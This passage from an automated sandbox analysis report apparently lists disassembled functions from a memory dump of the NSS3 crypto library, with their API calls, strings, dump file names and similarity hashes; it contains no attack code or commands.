Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C810EFA

Part of subcall function 6C6FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6FAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C810ED9, 6C810EE5, 6C810F06, 6C810F0B
Aborting, xrefs: 6C810EB3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 199c7f2a02c49eeafef970717460c95968a5641a3ab1ae3a49c3ed7b48723253
Instruction ID: 325c1dda61198b920c477df8adbc04f468b77440543c4db2ba49722e2fe7e217
Opcode Fuzzy Hash: 199c7f2a02c49eeafef970717460c95968a5641a3ab1ae3a49c3ed7b48723253
Instruction Fuzzy Hash: E6F0A4B59001187BDA617B609C49C9B3E2DDF46269F404834FD0956603DB79E924DAF3

Function 6C774DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C774DCB

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C774DE1

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C774DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C774E59

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C83300C,00000000), ref: 6C774EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C774EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C774F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77521A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 8e62f1bccbfc14d8ddd926f430311ba46d80deae4e9d6143c5c70575dd052f94
Instruction ID: 3e7a4717d974f12adccb4836e9cfff8d1d25040f1b4190da259b7fc3db865403
Opcode Fuzzy Hash: 8e62f1bccbfc14d8ddd926f430311ba46d80deae4e9d6143c5c70575dd052f94
Instruction Fuzzy Hash: D7F19B71E00209CBDF24CF54EA447AEB7B2BF44358F258129E915AB781E775E981CFA0

Function 6C78CFA0 Relevance: 16.7, APIs: 11, Instructions: 212threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56

PR_EnterMonitor.NSS3(?), ref: 6C78CFFC

Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F

PR_GetCurrentThread.NSS3 ref: 6C78D011
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78D08E
PR_GetCurrentThread.NSS3 ref: 6C78D109
PR_EnterMonitor.NSS3(?), ref: 6C78D182
PR_ExitMonitor.NSS3(?), ref: 6C78D1B9
PR_SetError.NSS3(00000000,00000000), ref: 6C78D1D8
PR_ExitMonitor.NSS3(?), ref: 6C78D1EC
PR_GetCurrentThread.NSS3 ref: 6C78D224
PR_ExitMonitor.NSS3(?), ref: 6C78D245
PR_SetError.NSS3(FFFFD036,00000000), ref: 6C78D270

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$CurrentEnterErrorExitThreadValue$CriticalSection$IdentitiesLayerLeave
String ID:
API String ID: 3829233501-0
Opcode ID: 67aa29874bb316f58dc45018fb0c9e446d2b1364227ccbd3fe374c5d8b94a493
Instruction ID: 7e7ccda129004bdf1eb0dc6cc9a411faf151d9d8226bb580fa811c6906e4652d
Opcode Fuzzy Hash: 67aa29874bb316f58dc45018fb0c9e446d2b1364227ccbd3fe374c5d8b94a493
Instruction Fuzzy Hash: C5715EB0D061129BDB105F20DF88BDA37B4AF2135CF194277EF055AA92E336C994C79A

Function 6C704FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C850148,?,6C716FEC), ref: 6C70502A
PR_NewLock.NSS3(00000001,00000000,6C850148,?,6C716FEC), ref: 6C705034
PL_NewHashTable.NSS3(00000000,6C75FE80,6C75FD30,6C7AC350,00000000,00000000,00000001,00000000,6C850148,?,6C716FEC), ref: 6C705055
PL_NewHashTable.NSS3(00000000,6C75FE80,6C75FD30,6C7AC350,00000000,00000000,?,00000001,00000000,6C850148,?,6C716FEC), ref: 6C70506D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 37a9a00b2223fbd3c383638d5e2820b17ea5921149aec95955976290a776f7fd
Instruction ID: 8b955900cf231a32fcb22b3b4bdaec9cfcbd346cbbdc1ca67e28deea7300c844
Opcode Fuzzy Hash: 37a9a00b2223fbd3c383638d5e2820b17ea5921149aec95955976290a776f7fd
Instruction Fuzzy Hash: 64311AF1B092109BEB608B67994C76B3BF8BB1736CF015174E90087641DB78A404CBE5

Function 6C6A2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C6A2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C6A3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C6A30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A3178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6A3022, 6C6A3156, 6C6A3162, 6C6A318A, 6C6A3196, 6C6A31A2, 6C6A31AE, 6C6A31BA, 6C6A31C6
database corruption, xrefs: 6C6A316C
%s at line %d of [%.10s], xrefs: 6C6A3171

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: b604f949c0516d0b01da5057a84f7987d4f377abd493ced042d895d8d4f87fef
Instruction ID: c3b291e8c95163d7e5a2a7cfe72f24221d79b8757bdd0853435af52e6ca0a051
Opcode Fuzzy Hash: b604f949c0516d0b01da5057a84f7987d4f377abd493ced042d895d8d4f87fef
Instruction Fuzzy Hash: 14B18DB0E052199BCB18CFDDC885AEEB7B1BF49304F148529E849A7B41D374DD42CBA8

Function 6C71FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C71FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C71FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C71FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C71FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C71FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C71FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C71FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C71FD84

Strings

:, xrefs: 6C71FD78

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 8b8ddf341b8283f30729024ec7fa57458d943361f99ae01168f41c6bca215111
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: DE31E2B29182065BEB108EA8DE1A7BF77A8AF45358F190534DC59A7F00E771E908C7D2

Function 6C736C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C736C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C736C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C736CA3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C736CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C736CD5

Strings

hSession = 0x%x, xrefs: 6C736C7E, 6C736C8E
(CK_INVALID_HANDLE), xrefs: 6C736C9C
pMechanism = 0x%p, xrefs: 6C736CD0
C_DigestInit, xrefs: 6C736C61

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 32861e6dd04f6e70c20d2c47e788edbfb21695d8db4093cf15d7af48eeed4d62
Instruction ID: 1163715778a3afe0dee5052f636e1e3c9e6b50d696fca48f51abdc26a2efb1c1
Opcode Fuzzy Hash: 32861e6dd04f6e70c20d2c47e788edbfb21695d8db4093cf15d7af48eeed4d62
Instruction Fuzzy Hash: 672125306051249BDB219B25DF4DFAA37B5EB8231CF446435E40D9BB03DB38A948C7D6

Function 6C700F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C700F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C700F84

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C71F59B,6C82890C,?), ref: 6C700FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C700FC1

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C700FDB
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C700FEF
PL_FreeArenaPool.NSS3(?), ref: 6C701001
PL_FinishArenaPool.NSS3(?), ref: 6C701009

Strings

security, xrefs: 6C700F5C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: f3c7cbbd89899d149393d7f0e87503b34d2cb22ae631bb8d0a2eaddd03ffadad
Instruction ID: c0013a623214527b89b48435bd8c03dea16a3f4a886bf371f4f83fa1af674741
Opcode Fuzzy Hash: f3c7cbbd89899d149393d7f0e87503b34d2cb22ae631bb8d0a2eaddd03ffadad
Instruction Fuzzy Hash: 922128B1A04244ABE7109F25DE48AAB77B4EF4535CF048928FC1897B01FB31E659CBD2

Function 6C706DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C707D8F,6C707D8F,?,?), ref: 6C706DC8

Part of subcall function 6C75FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C75FE08
Part of subcall function 6C75FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C75FE1D
Part of subcall function 6C75FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C75FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C707D8F,?,?), ref: 6C706DD5

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FA0,00000000,?,?,?,?,6C707D8F,?,?), ref: 6C706DF7

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C706E35

Part of subcall function 6C75FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C75FE29
Part of subcall function 6C75FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C75FE3D
Part of subcall function 6C75FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C75FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C706E4C

Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FE0,00000000), ref: 6C706E82

Part of subcall function 6C706AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C70B21D,00000000,00000000,6C70B219,?,6C706BFB,00000000,?,00000000,00000000,?,?,?,6C70B21D), ref: 6C706B01
Part of subcall function 6C706AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C706B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C706F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C706F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FE0,00000000), ref: 6C706F6B
PR_SetError.NSS3(FFFFE005,00000000,6C707D8F,?,?), ref: 6C706FE1

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 3f25f0f97af0a179ac95c4ee10e38461f9f8746b4b5b67b2375b7150c0c32e6a
Instruction ID: fe878ca64825f1aa36d2ca572a45e191b3c442ffcc7bfc4682762650e52c169f
Opcode Fuzzy Hash: 3f25f0f97af0a179ac95c4ee10e38461f9f8746b4b5b67b2375b7150c0c32e6a
Instruction Fuzzy Hash: EF715EB1E106469BDB00CF55CE54BAABBE4BF54348F154229EC08D7B11E770EAD5CB90

Function 6C740FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C741057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C741085
PK11_GetAllTokens.NSS3 ref: 6C7410B1
free.MOZGLUE(?), ref: 6C741107
PR_SetError.NSS3(00000000,00000000), ref: 6C741172
free.MOZGLUE(?), ref: 6C741182
free.MOZGLUE(?), ref: 6C7411A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7411C5

Part of subcall function 6C7452C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C71EAC5,00000001), ref: 6C7452DF
Part of subcall function 6C7452C0: EnterCriticalSection.KERNEL32(?), ref: 6C7452F3
Part of subcall function 6C7452C0: PR_Unlock.NSS3(?), ref: 6C745358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7411D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7411F3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: d487f8bd61c357004ee58081aa8ab5ffed3c153e323a480f6d77234bf4db6e60
Instruction ID: a3ae7b89685b31dbb7c3697b30d306c5d7bb095f162765280d7f1262ce85902f
Opcode Fuzzy Hash: d487f8bd61c357004ee58081aa8ab5ffed3c153e323a480f6d77234bf4db6e60
Instruction Fuzzy Hash: 3661B5B4E00345DBEB00EF64DA45BAAB7B5AF04348F148138EC19AB751E771E954CB91

Function 6C74ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEF1
free.MOZGLUE(6C72CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C72CDBB,?), ref: 6C74AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AF30

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 5501cb47128c6dd54140df602d6fca9b82420ef51fbaff7586fe24cbd62293ae
Instruction ID: 54ec794f83882ebc7186815bb25590ebdd187a8eb99eebcb1a3ba911c9760790
